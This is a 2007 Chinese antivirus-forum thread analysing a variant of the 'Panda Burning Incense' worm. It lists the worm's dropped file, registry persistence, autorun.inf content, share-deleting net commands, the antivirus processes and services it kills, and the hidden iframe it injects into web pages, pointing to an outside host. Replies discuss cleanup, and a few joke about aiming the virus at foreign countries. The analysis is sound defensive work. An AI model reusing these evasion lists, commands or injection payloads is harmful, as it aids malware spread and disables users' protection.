瑞星卡卡安全论坛

首页 » 技术交流区 » 反病毒/反流氓软件论坛 » 再写"熊猫烧香" 希望作者能看到..
mopery - 2007-1-15 23:59:00
今天在 CISRT 看到一篇熊猫的分析(http://hi.baidu.com/cisrt/blog/item/b570343ff721e3ec54e723c5.html)..今天刚写的..今天我也接到个与这个不同的..再次分析..主要是这次写有点意义.. 卡卡发帖 作者应该能看到..

运行样本..
释放文件
C:\WINDOWS\system32\drivers\spo0lsv.exe

创建启动项
[software\microsoft\windows\currentversion\run]
"svcshare"="C:\WINDOWS\system32\drivers\spo0lsv.exe"

修改 显示文件和文件夹 注册表
[software\microsoft\windows\currentversion\explorer\advanced\folder\hidden\showall]
"checkedvalue"=dword:00000000

所有根目录及移动存储生成
X:\setup.exe
X:\autorun.inf
[AutoRun]
OPEN=setup.exe
shellexecute=setup.exe
shell\Auto\command=setup.exe

使用命令关闭共享
cmd.exe /c net share X$ /del /y
cmd.exe /c net share admin$ /del /y

尝试关闭窗口
防火墙
进程
杀毒
virusscan
nod32
网镖
毒霸
瑞星
江民
超级兔子
优化大师
木马清道夫
卡巴斯基反病毒
symantec antivirus
duba
esteem procs
绿鹰pc
密码防盗
噬菌体
木马辅助查找器
system safety monitor
wrapped gift killer
winsock expert
游戏木马检测大师
超级巡警
pjf(ustc)
icesword
msctls_statusbar32

尝试关闭进程
mcshield.exe
vstskmgr.exe
naprdmgr.exe
updaterui.exe
tbmon.exe
scan32.exe
ravmond.exe
ccenter.exe
ravtask.exe
rav.exe
ravmon.exe
ravmond.exe
ravstub.exe
kvxp.kxp
kvmonxp.kxp
kvcenter.kxp
kvsrvxp.exe
kregex.exe
uihost.exe
trojdie.kxp
frogagent.exe
logo1_.exe
logo_1.exe
rundl132.exe
regedit.exe
msconfig.exe
taskmgr.exe

删除以下启动项
software\microsoft\windows\currentversion\run\ravtask
software\microsoft\windows\currentversion\run\kvmonxp
software\microsoft\windows\currentversion\run\kav
software\microsoft\windows\currentversion\run\kavpersonal50
software\microsoft\windows\currentversion\run\mcafeeupdaterui
software\microsoft\windows\currentversion\run\network associates error reporting service
software\microsoft\windows\currentversion\run\shstatexe
software\microsoft\windows\currentversion\run\ylive.exe
software\microsoft\windows\currentversion\run\yassistse

禁用以下服务
schedule
sharedaccess
rsccenter
rsravmon
kvwsc
kvsrvxp
kavsvc
avp
kavsvc
mcafeeframework
mcshield
mctaskmanager
navapsvc
wscsvc
kpfwsvc
sndsrvc
ccproxy
ccevtmgr
spbbcsvc
symantec core lc
npfmntor
mskservice
firesvc

搜索感染除以下目录外的所有.exe/.scr/.pif/.com/.htm/.html/.asp/.php/.jsp/.aspx文件
windows
winnt
system32
documents and settings
system volume information
recycled
windows nt
windowsupdate
windows media player
outlook express
internet explorer
netmeeting
common files
complus applications
messenger
installshield installation information
msn
microsoft frontpage
movie maker
msn gamin zone

感染时..病毒会跳过文件名为 setup.exe 和 ntdetect.com 的文件..并删除gho文件..

感染的 .exe/.scr/.pif/.com/ 文件在 头部添加:30,001 字节(病毒主体)  尾部添加:29 字节(标记信息)

感染的 .htm/.html/.asp/.php/.jsp/.aspx 网页文件 在尾部加入
</html><iframe src=http://www.ac86.cn/66/index.htm width="0" height="0"></iframe>

在访问过的目录下生成 desktop_.ini 文件..

用弱口令访问区域内的计算机(gamesetup.exe)...口令就不列了..


说重点.. 写这分析帖.. 是想跟作者说几句..
在病毒中留下的字 "满城尽烧国宝香" 这是事实..现在中熊猫的还不够多么?

taylor0577 找你好象也没什么事哦!!!

说实在.. "我*****更新**了!" 我也希望如此..也请您成为现实..

如果您愿意可以联系下.. 我很想知道 艾玛 的事..-.-(私人)

                                                            by:mopery
友好人士 - 2007-1-16 0:24:00
汗!江湖恩怨....
受害的是广大无辜网民!
放下屠刀,立地成佛吧!
上饶创锋电脑 - 2007-1-16 0:52:00
看看我写的新贴吧。我没有任何的恶意,请楼主看明我的意思,不要无故封我的贴,谢谢~!
至于你贴出来的技术资料,试想一下一个普通的瑞星用户能解决吗?我只是站在一个计算机工作者的角度上,提出一个我实验成功的手工小方法,解决一下软件的小BUG而己,有至于。。。。。吗?
上饶创锋电脑 - 2007-1-16 0:55:00
还有一个问题我后面发了一个重整理好的速灭法的贴子,楼主不知是不是把它KILL掉了?
mopery - 2007-1-16 1:52:00
引用:
【上饶创锋电脑的贴子】还有一个问题我后面发了一个重整理好的速灭法的贴子,楼主不知是不是把它KILL掉了?
………………


自己查阅下dos命令..再回来说我吧..

你给我熊猫样本.. 我修复不了全部exe(工具修复..或者手动修复.)我辞职你看..

--------------------------------------------------------
刚具体看了看 重新理 的那个..
问你几个问题..
⒈ del *.exe 你知道撒意思不? 现在电脑里的东西谁不是乱放..再者 在C:\ 也这么搞?
瑞星不能杀的原因,在技术的角度上我们可以称为BUG,因为他不能查杀具有隐含、系统属性的文件,所以用我的方法虽然看起来原始一点,但非常的有效。
瑞星不能查熊猫算bug? 你又知道瑞星没办法查隐藏文件和系统属性文件?你的方法只会误砍一堆文件而放过熊猫..
⒊ 你帖子 前后矛盾知道不? 整理跟没整理有区别?


鸟儿天上飞 - 2007-1-16 5:52:00
搜索感染除以下目录外的所有.exe/.scr/.pif/.com/.htm/.html/.asp/.php/.jsp/.aspx文件

够狠的啊 呵呵 长大了俺也学编程..
水树雨下 - 2007-1-16 6:09:00
现在高手太多了,比如这个http://forum.ikaka.com/topic.asp?board=28&artid=8251104
估计俺们离隐居不远了……



今天开始..现在开始..凡是误倒帖..一律可上报..
by:mopery
鸟儿天上飞 - 2007-1-16 6:16:00
天方夜谈...这算什么..看这个..
http://forum.ikaka.com/topic.asp?board=28&artid=8251343
水樹雨下 - 2007-1-16 6:20:00
引用:
【鸟儿天上飞的贴子】天方夜谈...这算什么..看这个..
http://forum.ikaka.com/topic.asp?board=28&artid=8251343
………………

看了,干脆直接用format,反正都要杀,不如杀的彻底些
deadmanzj - 2007-1-16 9:31:00
楼上马甲???????
水樹雨下 - 2007-1-16 9:35:00
引用:
【deadmanzj的贴子】楼上马甲???????
………………

自己的名字自己先注
newcenturymoon - 2007-1-16 10:07:00
呵呵  那天发现病毒里有mopery的名字哦
饭后点心 - 2007-1-16 10:30:00
不过话说回来,熊猫的作者的确很厉害.上次我就用了3天时间杀了5台机器......
熊猫作者,老对自己人放毒没意思的,去对美国人放毒吧.让他们都认识认识我们的国宝.老自己人打自己人没意思的!!
king改改 - 2007-1-16 10:35:00
各位高手,怎么样才能把熊猫烧香这个病毒彻底杀掉啊 。请各位大侠指点阿 ,我专杀工具也用过了,瑞星野用过了就是杀不掉啊。
艾玛 - 2007-1-16 10:49:00
【CISRT2007018】熊猫烧香变种 感染文件 修改网页 spo0lsv.exe 解决方案
http://www.cisrt.org/bbs/viewthread.php?tid=686

希望能如作者所说的,不再更新
mahuanniaobu - 2007-1-16 11:16:00
楼上的方法不太通用,只适合一般的家庭用户
afkp4e7 - 2007-1-16 11:16:00
赶快预防
要不死的很惨
黑哥001 - 2007-1-16 11:24:00
本人建议公司用户,先断网,一台一台搞,全搞好了再连网.
搞伤了啊 - 2007-1-16 11:30:00
楼上的方法不好...GHO怎么办,来个简单容易懂的~~
taylor05771 - 2007-1-16 11:37:00
不就熊猫么

中招的基本都是 没防护的家伙
foranyone - 2007-1-16 11:54:00
每天都有病毒,我覺得沒必要去謾罵.如果沒有了病毒,瑞星也早下崗了
水星灵芝 - 2007-1-16 12:01:00
瑞星的技术人员努力工作啊 ~~~~ 强烈要求反映快点~~~不惜任何代价也要保住瑞星公司的名誉啊 !!!
我是大胡子 - 2007-1-16 12:05:00
内战内行!
HTTLOVEWLB - 2007-1-16 12:13:00
真的很好的。这个病毒可是很讨厌的,要是感染上了那可就是麻烦了?
太史悟寒 - 2007-1-16 12:38:00
看不懂
搞伤了啊 - 2007-1-16 13:15:00
很可惜,我已经感染上了,其他的都还好,就是任何杀毒的都打不开~~~`
另壶冲 - 2007-1-16 14:02:00
我刚才还在想, 在小日本 是不是也在爆发着 国宝烧香??
afkp4e7 - 2007-1-16 14:25:00
怎么不去日本挂点
HELLO你好 - 2007-1-16 16:32:00
恩.同意29楼.28楼....
熊猫作者努力啊....
thull - 2007-1-16 16:46:00
事实证明 作者可能有些心理变态
而且 作者如果在武汉的话 警察办事也太没效率
现在有点不明白
就是作者到底是怎么把写好的病毒散播出去的?
12345
查看完整版本: 再写"熊猫烧香" 希望作者能看到..